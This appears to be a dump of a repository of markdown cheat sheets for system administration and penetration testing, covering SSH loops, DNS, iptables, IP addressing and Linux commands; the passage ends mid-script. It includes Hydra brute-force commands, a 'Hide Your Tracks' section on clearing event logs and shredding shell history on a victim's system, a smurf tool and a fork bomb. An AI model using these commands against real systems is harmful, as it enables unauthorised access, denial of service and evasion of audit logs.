├── Collection ├── Automatically run commands over SSH on many servers.md ├── Brute Forcing Services.md ├── CHKCONFIG.md ├── Cisco commands.md ├── Common ports.md ├── DNS.md ├── Exploit Research.md ├── Hidden tools in Command Line.md ├── Hide Your Tracks.md ├── IP Tables.md ├── IPv4.md ├── IPv6.md ├── Kali Linux Commands.md ├── Linux Misc Commands.md ├── Linux Network Commands.md ├── Linux Scripting.md ├── Linux System Info.md ├── Manipulating files.md ├── Metasploit.md ├── Miscellaneous Commands Windows.md ├── Packet Capturing.md ├── Password Cracking.md ├── Powershell.md ├── PsExec.md ├── Running Remote Commands.md ├── SNMP.md ├── Solaris.md ├── Startup Directories.md ├── Terminal Services.md ├── Useful Run Commands.md ├── Using the PHP pfSense Shell.md ├── VPN.md ├── WMIC.md ├── Windows Net_Domain Commands.md ├── Windows Network Commands.md ├── Windows System Info Commands.md ├── Windows Versions.md └── Windows registry.md ├── Literatura.md └── README.md /Collection/Automatically run commands over SSH on many servers.md: -------------------------------------------------------------------------------- 1 | # Example [[1]] 2 | 3 | tmpdir=${TMPDIR:-/tmp}/pssh.$$ 4 | mkdir -p $tmpdir 5 | count=0 6 | while IFS= read -r userhost; do 7 | ssh -n -o BatchMode=yes ${userhost} 'uname -a' > ${tmpdir}/${userhost} 2>&1 & 8 | count=`expr $count + 1` 9 | done < userhost.lst 10 | while [ $count -gt 0 ]; do 11 | wait $pids 12 | count=`expr $count - 1` 13 | done 14 | echo "Output for hosts are in $tmpdir" 15 | [1]: 16 | -------------------------------------------------------------------------------- /Collection/Brute Forcing Services.md: -------------------------------------------------------------------------------- 1 | # Brute Forcing Services [[2]] 2 | 3 | ### Hydra FTP Brute Force 4 | 5 | hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f 192.168.X.XXX ftp -V 6 | 7 | ### Hydra POP3 Brute Force 8 | 9 | hydra -l USERNAME -P /usr/sha/wordlistsnmap.lst -f 192.168.X.XXX pop3 -V 10 | 11 | ### Hydra SMTP Brute Force 12 | 13 | hydra -P /usr/share/wordlistsnmap.lst 192.168.X.XXX smtp -V 14 | 15 | 16 | 17 | 18 | [2]: 19 | -------------------------------------------------------------------------------- /Collection/CHKCONFIG.md: -------------------------------------------------------------------------------- 1 | # CHKCONFIG[[3]] 2 | The chkconfig utility is a command-line tool that allows you to specify in which runlevel to start a selected service, as well as to list all available services along with their current setting. 3 | 4 | $ chkconfig --list # Listing the Services 5 | $ chkconfig --list service_name # Display the current settings for a selected service only 6 | $ chkconfig service_name on # Enabling a Service 7 | $ chkconfig service_name on --level runlevels # To enable a service in certain runlevels only 8 | $ chkconfig service_name off # Disabling a Service 9 | 10 | [3]: 11 | -------------------------------------------------------------------------------- /Collection/Cisco commands.md: -------------------------------------------------------------------------------- 1 | # Cisco commands 2 | 3 | ### Exec commands [[4]] 4 | 5 | <1-99> # Session number to resume 6 | connect # Open a terminal connection 7 | disconnect # Disconnect an existing telnet session 8 | enable # Turn on privileged commands 9 | exit # Exit from Exec mode 10 | help # Description of the interactive help system 11 | lat # Open a lat connection 12 | lock # Lock the terminal 13 | login # Log in as a particular user 14 | logout # Exit from Exec mode and log out 15 | menu # Start a menu-based user interface 16 | mbranch # Trace multicast route for branch of tree 17 | mrbranch # Trace reverse multicast route to branch of tree 18 | mtrace # Trace multicast route to group 19 | name-connection # Name an existing telnet connection 20 | pad # Open a X.29 PAD connection 21 | ping # Send echo messages 22 | resume # Resume an active telnet connection 23 | show # Show running system information 24 | systat # Display information about terminal lines 25 | telnet # Open a telnet connection 26 | terminal # Set terminal line parameters 27 | tn3270 # Open a tn3270 connection 28 | trace # Trace route to destination 29 | where # List active telnet connections 30 | x3 # Set X.3 parameters on PAD 31 | 32 | ### Common commands [[5]] 33 | 34 | ? # Help 35 | show running-configuration # Shows the router, switch, or firewall's current configuration 36 | copy running-configuration startup-configuration # Save the configuration that is currently being modified (in RAM), also known as the running-configuration, to the nonvolatile RAM (NVRAM) 37 | show interface # Displays the status of the router's interfaces 38 | show ip interface # Provides information about the configuration and status of the IP protocol and its services, on all interfaces. 39 | config terminal, enable, interface, and router # Change modes 40 | no shutdown # Enables an interface (brings it up) 41 | show ip route # Show the router's routing table 42 | show version # Gives you the router's configuration register 43 | debug # It provides detailed debugging output on a certain application, protocol, or service 44 | 45 | [4]: 46 | [5]: 47 | 48 | 49 | -------------------------------------------------------------------------------- /Collection/Common ports.md: -------------------------------------------------------------------------------- 1 | # Common ports[[6]] 2 | 3 | ![common-ports-1-638.jpg](https://www.dropbox.com/s/t5xqd8vnlqnftpd/common-ports-1-638.jpg?dl=0&raw=1) 4 | 5 | [6]: -------------------------------------------------------------------------------- /Collection/DNS.md: -------------------------------------------------------------------------------- 1 | # DNS 2 | 3 | ### dnsrecon Usage Example[[7]] 4 | 5 | Scan a domain (-d example.com), use a dictionary to brute force hostnames (-D /usr/share/wordlists/dnsmap.txt), do a standard scan (-t std), and save the output to a file (–xml dnsrecon.xml) 6 | 7 | nsrecon -d example.com -D /usr/share/wordlists/dnsmap.txt -t std --xml dnsrecon.xml 8 | 9 | ### Ping scan grepable output [[8]] 10 | 11 | # nmap -sn -oG - -iR 100 12 | # Nmap 5.35DC18 scan initiated [time] as: nmap -sn -oG - -iR 5 13 | Host: 93.182.218.153 () Status: Up 14 | Host: 154.223.142.85 () Status: Down 15 | Host: 120.128.8.97 () Status: Down 16 | Host: 47.159.134.149 () Status: Down 17 | Host: 24.172.4.19 () Status: Down 18 | # Nmap done at [time] -- 5 IP addresses (1 host up) scanned in 4.25 seconds 19 | 20 | [7]: 21 | [8]: 22 | 23 | 24 | 25 | -------------------------------------------------------------------------------- /Collection/Exploit Research.md: -------------------------------------------------------------------------------- 1 | # Exploit Research [[9]] 2 | 3 | searchsploit windows 2003 | grep -i local # Search exploit-db for exploit, in this example windows 2003 + local esc 4 | site:exploit-db.com exploit kernel <= 3 # Use google to search exploit-db.com for exploits 5 | grep -R "W7" /usr/share/metasploit-framework/modules/exploit/windows/* # Search metasploit modules using grep - msf search 6 | 7 | [9]: 8 | -------------------------------------------------------------------------------- /Collection/Hidden tools in Command Line.md: -------------------------------------------------------------------------------- 1 | # Hidden tools in Command Line[[10]] 2 | NOTICE: You need to run CMD with administrator privileges 3 | 4 | ### System file checker 5 | 6 | $ sfc /scannow # This performs an immediate scan of your system and will replace files as necessary. You may need to restart Windows when it's done if it finds problems 7 | $ sfc /scanonce # This performs a scan the next time you restart your system 8 | $ sfc /scanboot # This schedules a scan to be performed every time you restart your system 9 | $ sfc Revert # This returns the System File Checker to its default settings. You can use it to turn off the /scanboot option, for example 10 | 11 | ### Check disk 12 | 13 | $ chkdsk Volume # If you want to check a whole drive, just type the drive letter 14 | $ chkdsk Filename # You can also use chkdsk to check a single file or group of files 15 | $ chkdsk /F # Run it with this option to have chkdsk go ahead and fix those errors 16 | $ chkdsk /R # This option forces chkdsk to locate bad sectors and recover information from them. If chkdsk cannot lock the disk (which it usually can't since you're actually using Windows), it will prompt you run the command the next time you restart Windows 17 | 18 | ### Cipher 19 | 20 | $ cipher /W:pathname # The /W option removes data on unused portions of a volume, effectively erasing data that may be hanging around on your hard drive after deletion. You can point cipher at an entire volume (like C:) or a specific folder 21 | 22 | NOTICE: This applies to traditional hard drives and not SSDs 23 | 24 | ### Driverquery 25 | 26 | $ driverquery /s # This option lets you specify the name or IP address of a remote computer so that you investigate the drivers it has installed 27 | $ driverquery /si # This option shows you the digital signature information for drivers 28 | $ driverquery /fo # This is really the key option you'll use with driverquery. It lets you specify the format in which information is displayed so that you can more effectively save it as a report. 29 | 30 | Example: driverquery /fo CSV > drivers.csv 31 | 32 | ![g91lech9vvrplpbh0qnd.png](https://www.dropbox.com/s/mfgbhgugjic88vq/g91lech9vvrplpbh0qnd.png?dl=0&raw=1) 33 | 34 | [10]: 35 | 36 | -------------------------------------------------------------------------------- /Collection/Hide Your Tracks.md: -------------------------------------------------------------------------------- 1 | # Hide Your Tracks [[11]] 2 | 3 | ### Meterpreter 4 | 5 | $ clearev # Clear all event logs (Application, System, Security) 6 | ### Windows machines 7 | 8 | - Download [clearlogs.exe] 9 | - Run: clearlogs.exe -sec 10 | NOTICE: You will need physical access to the victims system 11 | 12 | ### Linux systems 13 | 14 | $ kwrite /var/log/messages # Delete all or specific entries 15 | NOTICE: You can use any other text editor 16 | 17 | ### Erasing the Command History 18 | 19 | $ more ~/.bash_history # Command history 20 | $ echo $HISTSIZE # The size of our history file 21 | $ export HISTSIZE=0 # Set the histoty file size to zero 22 | 23 | ### Shredding the History File 24 | 25 | $ shred -zu root/.bash_history # The shred command with the -zu switches will overwrite the history with zeros and delete the file. 26 | 27 | ### The logs[[12]] 28 | 29 | $ WTMP # Every log on/off, with login/logout time plus tty and host 30 | $ UTMP # Who is online at the moment 31 | $ LASTLOG # Where did the logins come from 32 | ### Location of logs 33 | 34 | - UTMP : /etc or /var/adm or /usr/adm or /usr/var/adm or /var/log 35 | - WTMP : /etc or /var/adm or /usr/adm or /usr/var/adm or /var/log 36 | - LASTLOG : /usr/var/adm or /usr/adm or /var/adm or /var/log 37 | 38 | NOTICE: The location depends on UNIX distribution 39 | 40 | ### Shell History 41 | 42 | $ mv .logout save.1 43 | $ echo rm .history>.logout 44 | $ echo rm .logout>>.logout 45 | $ echo mv save.1 .logout>>.logout 46 | # Delete .history 47 | 48 | ### Log modifier programs 49 | 50 | $ ah-1_0b.tar # Changes the entries of accounting information 51 | $ clear.c # Deletes entries in utmp, wtmp, lastlog and wtmpx 52 | $ cloak2.c # Changes the entries in utmp, wtmp and lastlog 53 | $ invisible.c # Overwrites utmp, wtmp and lastlog with predefines values 54 | $ marryv11.c # Edit utmp, wtmp, lastlog and accounting data 55 | $ wzap.c # Deletes entries in wtmp 56 | $ wtmped.c # Deletes entries in wtmp 57 | $ zap.c # Overwrites utmp, wtmp, lastlog - Don't use! Can be detected! 58 | NOTICE: Never delete the logs 59 | 60 | [11]: 61 | [clearlogs.exe]: 62 | [12]: -------------------------------------------------------------------------------- /Collection/IP Tables.md: -------------------------------------------------------------------------------- 1 | # IP Tables[[13]] 2 | 3 | ### Create a set named geoset 4 | 5 | $ sudo ipset create geoblock hash:net,port 6 | 7 | ### Loop that runs banning list of countries from reaching the service of SSHD 8 | 9 | for IP in $(wget -O – http://www.ipdeny.com/ipblocks/data/countries/{cn,ru,kr,pk,tw,sg,hk}.zone) 10 | do 11 | # regular ban - block port 22 for countryXX 12 | sudo ipset add geoblock $IP,22 13 | done 14 | 15 | ### Preview of the list 16 | 17 | # sudo ipset list geoblock 18 | ### Delete whole list 19 | 20 | # sudo ipset del geoblock|"setname" 21 | 22 | ### Add rules to IPtables 23 | 24 | # sudo iptables -I INPUT -m set --set geoblock src -j DROP 25 | 26 | ### Save IPtables 27 | 28 | # service iptables save 29 | 30 | ### Reverse function 31 | 32 | # sudo iptables -A INPUT -m set --set !geoblock src -j DROP 33 | 34 | ### Connection States[[14]] 35 | 36 | #iptables -A INPUT -p tcp --dport ssh -s 10.10.10.10 -m state --state NEW,ESTABLISHED -j ACCEPT 37 | #iptables -A OUTPUT -p tcp --sport 22 -d 10.10.10.10 -m state --state ESTABLISHED -j ACCEPT 38 | 39 | ### Accept connections by default 40 | 41 | iptables --policy INPUT ACCEPT 42 | iptables --policy OUTPUT ACCEPT 43 | iptables --policy FORWARD ACCEPT 44 | 45 | ### Red Hat Linux firewall[[15]] 46 | 47 | ### IPtables Packet Flow Diagram[[16]] 48 | 49 | ![Iptables.gif](https://www.dropbox.com/s/5gwp8tk1q9hhnr4/Iptables.gif?dl=0&raw=1) 50 | 51 | [13]: 52 | [14]: 53 | [15]: 54 | [16]: -------------------------------------------------------------------------------- /Collection/IPv4.md: -------------------------------------------------------------------------------- 1 | # IPv4 2 | 3 | ### CLASSFULL IP RANGES [[17]] 4 | 5 | Class A 6 | 0. 0. 0. 0 = 00000000.00000000.00000000.00000000 7 | 127.255.255.255 = 01111111.11111111.11111111.11111111 8 | 0nnnnnnn.HHHHHHHH.HHHHHHHH.HHHHHHHH 9 | 10 | Class B 11 | 128. 0. 0. 0 = 10000000.00000000.00000000.00000000 12 | 191.255.255.255 = 10111111.11111111.11111111.11111111 13 | 10nnnnnn.nnnnnnnn.HHHHHHHH.HHHHHHHH 14 | 15 | Class C 16 | 192. 0. 0. 0 = 11000000.00000000.00000000.00000000 17 | 223.255.255.255 = 11011111.11111111.11111111.11111111 18 | 110nnnnn.nnnnnnnn.nnnnnnnn.HHHHHHHH 19 | 20 | Class D 21 | 224. 0. 0. 0 = 11100000.00000000.00000000.00000000 22 | 239.255.255.255 = 11101111.11111111.11111111.11111111 23 | 1110XXXX.XXXXXXXX.XXXXXXXX.XXXXXXXX 24 | 25 | Class E 26 | 240. 0. 0. 0 = 11110000.00000000.00000000.00000000 27 | 255.255.255.255 = 11111111.11111111.11111111.11111111 28 | 1111XXXX.XXXXXXXX.XXXXXXXX.XXXXXXXX 29 | 30 | - n: indicates a bit used for the network ID 31 | - H: indicates a bit used for the host ID 32 | - X: indicates a bit without a specified purpose 33 | 34 | ### Reserved ranges [[18]] 35 | 36 | 0.0.0.0/8 # Used for broadcast messages to the current ("this") 37 | 10.0.0.0/8 # Used for local communications within a private network 38 | 100.64.0.0/10 # Used for communications between a service provider and its subscribers when using a carrier-grade NAT 39 | 127.0.0.0/8 # Used for loopback addresses to the local host 40 | 169.254.0.0/16 # Used for link-local addresses between two hosts on a single link when no IP address is otherwise specified, such as would have normally been retrieved from a DHCP server 41 | 172.16.0.0/12 # Used for local communications within a private network 42 | 192.0.0.0/24 # Used for the IANA IPv4 Special Purpose Address Registry 43 | 192.0.2.0/24 # Assigned as "TEST-NET" for use in documentation and examples. It should not be used publicly 44 | 192.88.99.0/24 # Used by 6to4 anycast relays 45 | 192.168.0.0/16 # Used for local communications within a private network 46 | 198.18.0.0/15 # Used for testing of inter-network communications between two separate subnets 47 | 198.51.100.0/24 # Assigned as "TEST-NET-2" for use in documentation and examples. It should not be used publicly 48 | 203.0.113.0/24 # Assigned as "TEST-NET-3" for use in documentation and examples. It should not be used publicly 49 | 224.0.0.0/4 # Reserved for multicast 50 | 240.0.0.0/4 # Reserved for future use 51 | 255.255.255.255/32 # Reserved for the "limited broadcast" destination address 52 | 53 | ### Subnetting [[19]] 54 | 55 | ![class_a_subnets.jpg](https://www.dropbox.com/s/i7k6anrqrew7q8h/class_a_subnets.jpg?dl=0&raw=1) 56 | 57 | ### Calculating subnet range [[20]] 58 | 59 | Address: 192.168.0.1 11000000.10101000.00000000 .00000001 60 | Netmask: 255.255.255.0 = 24 11111111.11111111.11111111 .00000000 61 | Wildcard: 0.0.0.255 00000000.00000000.00000000 .11111111 62 | => 63 | Network: 192.168.0.0/24 11000000.10101000.00000000 .00000000 (Class C) 64 | Broadcast: 192.168.0.255 11000000.10101000.00000000 .11111111 65 | HostMin: 192.168.0.1 11000000.10101000.00000000 .00000001 66 | HostMax: 192.168.0.254 11000000.10101000.00000000 .11111110 67 | Hosts/Net: 254 (Private Internet) 68 | 69 | [17]: 70 | [18]: 71 | [19]: 72 | [20]: 73 | -------------------------------------------------------------------------------- /Collection/IPv6.md: -------------------------------------------------------------------------------- 1 | # IPv6 2 | 3 | ### Broadcast addresses [[21]] 4 | 5 | ff02:: # Link Local: spans the same topological region as the corresponding unicast scope, i.e. all nodes on the same LAN 6 | ff05:: # Site local: is intended to span a single site 7 | ff08:: # Organization scope: Intended to span multiple sizes within the same organization 8 | ff0e:: # Global scope, assigned by IANA 9 | ff01:: # Interface local: Spans only a single interface on a node and is useful only for loopback transmission of multicast 10 | 11 | ### Interface adresses [[22]] 12 | 13 | fe80:: # link-local 14 | 2001:: # routable 15 | ::a.b.c.d # IPv4 compatible IPv6 16 | ::ffff:a.b.c.d # IPv4 mapped IPv6 17 | 18 | ### THC Ipv6 Toolkit [[23]] 19 | 20 | rsmurf6 # Smurfs the local network of the victim 21 | 22 | 23 | 24 | [21]: 25 | [22]: 26 | [23]: -------------------------------------------------------------------------------- /Collection/Kali Linux Commands.md: -------------------------------------------------------------------------------- 1 | # Kali Linux Commands[[24]] 2 | 3 | $ apropos # Change access permissions 4 | $ chown # Change file owner and group 5 | $ chroot # Run a command with a different root directory 6 | $ chkconfig # System services (runlevel) 7 | $ cksum # Print CRC checksum and byte counts 8 | $ clear # Clear terminal screen 9 | $ cmp # Compare two files 10 | $ comm # Compare two sorted files line by line 11 | $ command # Run a command – ignoring shell functions 12 | $ continue # Resume the next iteration of a loop 13 | $ cp # Copy one or more files to another location 14 | $ cron # Daemon to execute scheduled commands 15 | $ crontab # Schedule a command to run at a later time 16 | $ csplit # Split a file into context-determined pieces 17 | $ cut # Divide a file into several parts 18 | $ date # Display or change the date and time 19 | $ dc # Desk Calculator 20 | $ dd # Convert and copy a file, write disk headers, boot records 21 | $ ddrescue # Data recovery tool 22 | $ declare # Declare variables and give them attributes 23 | $ df # Display free disk space 24 | $ diff # Display the differences between two files 25 | $ diff3 # Show differences among three files 26 | $ dig # DNS lookup 27 | $ dir # Briefly list directory contents 28 | $ dircolors # Colour setup for `ls’ 29 | $ dirname # Convert a full pathname to just a path 30 | $ dirs # Display list of remembered directories 31 | $ dmesg # Print kernel & driver messages 32 | $ du # Estimate file space usage 33 | $ echo # Display message on screen 34 | $ egrep # Search files for lines that match an extended expression 35 | $ eject # Eject removable media 36 | $ enable # Enable and disable builtin shell commands 37 | $ env # Environment variables 38 | $ ethtool # Ethernet card settings 39 | $ eval # Evaluate several commands/arguments 40 | $ exec # Execute a command 41 | $ exit # Exit the shell 42 | $ expect # Automate arbitrary applications accessed over a terminal 43 | $ expand # Convert tabs to spaces 44 | $ export # Set an environment variable 45 | $ expr # Evaluate expressions 46 | $ false # Do nothing, unsuccessfully 47 | $ fdformat # Low-level format a floppy disk 48 | $ fdisk # Partition table manipulator for Linux 49 | $ fg # Send job to foreground 50 | $ fgrep # Search files for lines that match a fixed string 51 | $ file # Determine file type 52 | $ find # Search for files that meet a desired criteria 53 | $ fmt # Reformat paragraph text 54 | $ fold # Wrap text to fit a specified width 55 | $ for # Expand words, and execute commands 56 | $ format # Format disks or tapes 57 | $ free # Display memory usage 58 | $ fsck # File system consistency check and repair 59 | $ ftp # File Transfer Protocol 60 | $ function # Define Function Macros 61 | $ fuser # Identify/kill the process that is accessing a file 62 | $ gawk # Find and Replace text within files 63 | $ getopts # Parse positional parameters 64 | $ grep # Search files for lines that match a given pattern 65 | $ groupadd # Add a user security group 66 | $ groupdel # Delete a group 67 | $ groupmod # Modify a group 68 | $ groups # Print group names a user is in 69 | $ gzip # Compress or decompress named files 70 | $ hash # Remember the full pathname of a name argument 71 | $ head # Output the first part of files 72 | $ help # Display help for a built-in command 73 | $ history # Command History 74 | $ hostname # Print or set system name 75 | $ iconv # Convert the character set of a file 76 | $ id # Print user and group id’s 77 | $ if # Conditionally perform a command 78 | $ ifconfig # Configure a network interface 79 | $ ifdown # Stop a network interface 80 | $ ifup # Start a network interface up 81 | $ import # Capture an X server screen and save the image to file 82 | $ install # Copy files and set attributes 83 | $ jobs # List active jobs 84 | $ join # Join lines on a common field 85 | $ kill # Stop a process from running 86 | $ killall # Kill processes by name 87 | $ less # Display output one screen at a time 88 | $ let # Perform arithmetic on shell variables 89 | $ ln # Create a symbolic link to a file 90 | $ local # Create variables 91 | $ locate # Find files 92 | $ logname # Print current login name 93 | $ logout # Exit a login shell 94 | $ look # Display lines beginning with a given string 95 | $ lpc # Line printer control program 96 | $ lpr # Off line print 97 | $ lprint # Print a file 98 | $ lprintd # Abort a print job 99 | $ lprintq # List the print queue 100 | $ lprm # Remove jobs from the print queue 101 | $ ls # List information about files 102 | $ lsof # List open files 103 | $ make # Recompile a group of programs 104 | $ man # Help manual 105 | $ mkdir # Create new folders 106 | $ mkfifo # Make FIFOs (named pipes) 107 | $ mkisofs # Create an hybrid ISO9660/JOLIET/HFS filesystem 108 | $ mknod # Make block or character special files 109 | $ more # Display output one screen at a time 110 | $ mount # Mount a file system 111 | $ mtools # Manipulate MS-DOS files 112 | $ mtr # Network diagnostics (traceroute/ping) 113 | $ mv # Move or rename files or directories 114 | $ mmv # Mass Move and rename files 115 | $ netstat # Networking information 116 | $ nice # Set the priority of a command or job 117 | $ nl # Number lines and write files 118 | $ nohup # Run a command immune to hangups 119 | $ notify-send # Send desktop notifications 120 | $ nslookup # Query Internet name servers interactively 121 | $ open # Open a file in its default application 122 | $ op # Operator access 123 | $ passwd # Modify a user password 124 | $ paste # Merge lines of files 125 | $ pathchk # Check file name portability 126 | $ ping # Test a network connection 127 | $ pkill # Stop processes from running 128 | $ popd # Restore the previous value of the current directory 129 | $ pr # Prepare files for printing 130 | $ printcap # Printer capability database 131 | $ printenv # Print environment variables 132 | $ printf # Format and print data 133 | $ ps # Process status 134 | $ pushd # Save and then change the current directory 135 | $ pwd # Print Working Directory 136 | $ quota # Display disk usage and limits 137 | $ quotacheck # Scan a file system for disk usage 138 | $ quotactl # Set disk quotas 139 | $ ram # ram disk device 140 | $ rcp # Copy files between two machines 141 | $ read # Read a line from standard input 142 | $ readarray # Read from stdin into an array variable 143 | $ readonly # Mark variables/functions as readonly 144 | $ reboot # Reboot the system 145 | $ rename # Rename files 146 | $ renice # Alter priority of running processes 147 | $ remsync # Synchronize remote files via email 148 | $ return # Exit a shell function 149 | $ rev # Reverse lines of a file 150 | $ rm # Remove files 151 | $ rmdir # Remove folders 152 | $ rsync # Remote file copy (Synchronize file trees) 153 | $ screen # Multiplex terminal, run remote shells via ssh 154 | $ scp # Secure copy (remote file copy) 155 | $ sdiff # Merge two files interactively 156 | $ sed # Stream Editor 157 | $ select # Accept keyboard input 158 | $ seq # Print numeric sequences 159 | $ set # Manipulate shell variables and functions 160 | $ sftp # Secure File Transfer Program 161 | $ shift # Shift positional parameters 162 | $ shopt # Shell Options 163 | $ shutdown # Shutdown or restart linux 164 | $ sleep # Delay for a specified time 165 | $ slocate # Find files 166 | $ sort # Sort text files 167 | $ source # Run commands from a file 168 | $ split # Split a file into fixed-size pieces 169 | $ ssh # Secure Shell client (remote login program) 170 | $ strace # Trace system calls and signals 171 | $ su # Substitute user identity 172 | $ sudo # Execute a command as another user 173 | $ sum # Print a checksum for a file 174 | $ suspend # Suspend execution of this shell 175 | $ symlink # Make a new name for a file 176 | $ sync # Synchronize data on disk with memory 177 | $ tail # Output the last part of file 178 | $ tar # Tape Archiver 179 | $ tee # Redirect output to multiple files 180 | $ test # Evaluate a conditional expression 181 | $ time # Measure Program running time 182 | $ times # User and system times 183 | $ touch # Change file timestamps 184 | $ top # List processes running on the system 185 | $ traceroute # Trace Route to Host 186 | $ trap # Run a command when a signal is set(bourne) 187 | $ tr # Translate, squeeze, and/or delete characters 188 | $ true # Do nothing, successfully 189 | $ tsort # Topological sort 190 | $ tty # Print filename of terminal on stdin 191 | $ type # Describe a command 192 | $ ulimit # Limit user resources 193 | $ umask # Users file creation mask 194 | $ umount # Unmount a device 195 | $ unalias # Remove an alias 196 | $ uname # Print system information 197 | $ unexpand # Convert spaces to tabs 198 | $ uniq # Uniquify files 199 | $ units # Convert units from one scale to another 200 | $ unset # Remove variable or function names 201 | $ unshar # Unpack shell archive scripts 202 | $ until # Execute commands (until error) 203 | $ uptime # Show uptime 204 | $ useradd # Create new user account 205 | $ usermod # Modify user account 206 | $ users # List users currently logged in 207 | $ uuencode # Encode a binary file 208 | $ uudecode # Decode a file created by uuencode 209 | $ v # Verbosely list directory contents (`ls -l -b’) 210 | $ vdir # Verbosely list directory contents (`ls -l -b’) 211 | $ vi # Text Editor 212 | $ vmstat # Report virtual memory statistics 213 | $ wait # Wait for a process to complete 214 | $ watch # Execute/display a program periodically 215 | $ wc # Print byte, word, and line counts 216 | $ whereis # Search the user’s $path, man pages and source files for a program 217 | $ which # Search the user’s $path for a program file 218 | $ while # Execute commands 219 | $ who # Print all usernames currently logged in 220 | $ whoami # Print the current user id and name (`id -un’) 221 | $ wget # Retrieve web pages or files via HTTP, HTTPS or FTP 222 | $ write # Send a message to another user 223 | $ xargs # Execute utility, passing constructed argument lists 224 | $ xdg-open # Open a file or URL in the user’s preferred application 225 | $ yes # Print a string until interrupted 226 | [24]: -------------------------------------------------------------------------------- /Collection/Linux Misc Commands.md: -------------------------------------------------------------------------------- 1 | # Linux Misc Commands [[25]] 2 | 3 | Search commands 4 | 5 | $ find -type f | xargs ls -l | cut -c 33- | sort -n # Search for files - sort by filesize (add -r for reverse order) 6 | $ find -atime +32 -exec mv {} /var/archive/logs \; # Move files that are over 1 month old 7 | RPM commands 8 | 9 | $ rpm -q -a # List all installed packages 10 | $ rpm -U -v *.rpm # Upgrade packages 11 | $ rpm -Fvh *.rpm # Freshen packages This is the one you should use when applying the latest fixes 12 | $ for i in `cat `; do if rpm -qpl $i | grep libX >/dev/null; then echo $i; fi; done # To find which rpm file (not installed) has the file libX 13 | 14 | Debian commands 15 | 16 | $ apt-cache search # Search for package 17 | $ sudo apt-get install # Install package from repository 18 | $ sudo dpkg --install # Install package from localfile 19 | $ sudo apt-get update # Update package listsfrom repositories 20 | $ sudo apt-get -u upgrade # Upgrade installed packages to latest version 21 | 22 | Basic script functions 23 | 24 | $ for filename in * ; do echo > $filename; done # Basic script to perform something against a number of files 25 | 26 | Counting commands 27 | 28 | $ grep -v -e "^$" filename | wc -l # To count number of none empty lines in a file 29 | $ find . -name "*.p?" | xargs grep -v -e "^$" - | wc -l # To count number of source code lines (perl) 30 | 31 | [25]: 32 | -------------------------------------------------------------------------------- /Collection/Linux Network Commands.md: -------------------------------------------------------------------------------- 1 | # Linux network commands [[26]] 2 | 3 | General networking concepts that will help you in troubleshooting networks on Linux. 4 | 5 | $ watch ss -tp # Network connections 6 | $ netstat -ant # Tcp connections -anu=udp 7 | $ netstat -tulpn # Connections with PIDs 8 | $ lsof -i # Established connections 9 | $ smb:// ip /share # Access windows smb share 10 | $ share user x.x.x.x c$ # Mount Windows share 11 | $ smbclient -0 user\\\\ ip \\ share # SMB connect 12 | $ ifconfig eth# ip / cidr # Set IP and netmask 13 | $ ifconfig ethO:l ip / cidr # Set virtual interface 14 | $ route add default gw gw_ip # Set GW 15 | $ ifconfig eth# mtu [size] # Change MTU size 16 | $ export MAC=xx: xx: xx: xx: xx: xx # Change MAC 17 | $ ifconfig int hw ether MAC # Change MAC 18 | $ macchanger -m MAC int # Backtrack MAC changer 19 | $ iwlist int scan # Built-in wifi scanner 20 | $ dig -x ip # Domain lookup for IP 21 | $ host ip # Domain lookup for IP 22 | $ host -t SRV _ service _tcp.url.com # Domain SRV lookup 23 | $ dig @ ip domain -t AXFR # DNS Zone Xfer 24 | $ host -l domain namesvr # DNS Zone Xfer 25 | $ ip xfrm state list # Print existing VPN keys 26 | $ ip addr add ip / cidr dev ethO # Adds 'hidden' interface 27 | $ /var/log/messages | grep DHCP # List DHCP assignments 28 | $ tcpkill host ip and port port # Block ip:port 29 | $ echo "1" /proc/sys/net/ipv4/ip_forward # Turn on IP Forwarding 30 | $ echo "nameserver x.x.x.x" /etc/resolv.conf # Add DNS Server 31 | 32 | [26]: -------------------------------------------------------------------------------- /Collection/Linux Scripting.md: -------------------------------------------------------------------------------- 1 | # Linux scripting 2 | 3 | ### Understanding bash scripting[[27]] 4 | 5 | ### Ping sweep without NMAP [[28]] 6 | 7 | $ for i in `seq 1 255`; do ping -c 1 10.10.10.$i | tr \\n ' ' | awk '/1 received/ {print $2}'; done 8 | $ for i in {1..254}; do ping -c 1 -W 1 10.1.1.$i | grep 'from'; done 9 | 10 | ### Fork bomb[[29]] 11 | 12 | $ :(){ :|:& };: # forkbomb(){ forkbomb | forkbomb & }; forkbomb 13 | 14 | ### Monitor DNS[[30]] 15 | -It takes the IP address or hostname of the DNS server to check. Checks the records defined in the array. 16 | 17 | //Define defaults 18 | if($_SERVER[argv][1]) 19 | { 20 | $ns_server = $_SERVER[argv][1]; 21 | } else { 22 | echo "You need to supply a DNS server to check. Quitting.\n"; 23 | exit; 24 | } 25 | $hosts = array("zabbix.com" => "85.113.250.92", 26 | "php.net" => "69.147.83.197"); 27 | // Do query 28 | foreach($hosts as $host => $ip) 29 | { 30 | $result = shell_exec("dig +time=1 +tries=1 +short @".$ns_server." ".$host); 31 | if(!preg_match('/'.$ip.'/', $result)) 32 | { 33 | $failed = TRUE; 34 | } 35 | } 36 | if($failed) 37 | { 38 | echo "0\n"; 39 | } else { 40 | echo "1\n"; 41 | } 42 | ?> 43 | 44 | ### Monitoring NTP[[31]] 45 | 46 | #!/usr/local/bin/bash 47 | #ntptest 48 | #NTP test scripts for Zabbix monitor. Conditional return 49 | # of 1=success | 0= for failed response 50 | HOST_QUERY=$1 51 | if [`ntpq -pn $HOST_QUERY | grep -E -c '^\*'` -eq 1 ]; then 52 | #Sync responded, OK 53 | echo "1" 54 | else 55 | echo "0" 56 | fi 57 | 58 | NOTICE: Works with *nix Zabbix Server 59 | 60 | ### Special shell variables to be aware [[32]] 61 | 62 | $ $* # Passes in all of the arguments. This is useful for FOR loops 63 | $ $? # Gets the error code (exit()) status) of the last program executed 64 | $ $$ # Gets the PID of the current shell. 65 | $ $! # Gets the PID of the last background process 66 | $ $EUID # Gets the effective UID number of the scripts execution 67 | 68 | ### Linux Iptables Firewall Shell Script For Standalone Server[[33]] 69 | 70 | #!/bin/bash 71 | # A Linux Shell Script with common rules for IPTABLES Firewall. 72 | # By default this script only open port 80, 22, 53 (input) 73 | # All outgoing traffic is allowed (default - output) 74 | # ------------------------------------------------------------------------- 75 | # Copyright (c) 2004 nixCraft project 76 | # This script is licensed under GNU GPL version 2.0 or above 77 | # ------------------------------------------------------------------------- 78 | # This script is part of nixCraft shell script collection (NSSC) 79 | # Visit http://bash.cyberciti.biz/ 